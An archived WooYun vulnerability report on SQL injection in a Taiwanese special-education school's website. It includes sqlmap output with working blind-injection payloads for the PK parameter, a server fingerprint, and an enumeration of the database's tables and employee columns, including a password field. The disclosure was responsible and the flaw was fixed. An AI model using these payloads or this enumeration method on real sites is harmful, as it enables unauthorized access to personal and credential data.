乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开
國立臺東大學附屬特殊教育學校存在SQL注入目标站点:http://**.**.**.**/index.php?Act=article&PK=19&MK=44
sqlmap identified the following injection point(s) with a total of 269 HTTP(s) requests:---Parameter: PK (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Act=article&PK=19 AND 6862=6862&MK=44 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: Act=article&PK=19 AND (SELECT * FROM (SELECT(SLEEP(5)))ODcI)&MK=44---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.12current database: 'nttusps2014'current user is DBA: Falseavailable databases [3]:[*] information_schema[*] nttusps2014[*] test
表:
Database: nttusps2014+--------------------------+---------+| Table | Entries |+--------------------------+---------+| nttusps2014_weblog | 313063 || nttusps2014_webdownload | 36120 || nttusps2014_main | 1154 || nttusps2014_photogallery | 400 || nttusps2014_rightmenu | 28 || nttusps2014_employee | 16 || nttusps2014_config | 9 || nttusps2014_configbanner | 4 |+--------------------------+---------+
随便看一个表吧:
Table: nttusps2014_employee[19 columns]+------------+-----------+| Column | Type |+------------+-----------+| empaddress | char(255) || empclass | char(255) || empcommit | text || empdate | datetime || empdateadd | datetime || empdatedel | datetime || empemail | char(255) || empenable | int(11) || empid | char(255) || emplimit | int(11) || empname | char(255) || empphone | char(255) || empphonem | char(20) || empprikey | int(11) || emppw | char(255) || empub1 | text || empub2 | int(11) || empub3 | int(11) || empweb | char(255) |+------------+-----------+
数据跑的比较慢,就不贴出来了。
危害等级:高
漏洞Rank:16
确认时间:2015-12-15 23:26
感謝通報
2016-01-05:確認修復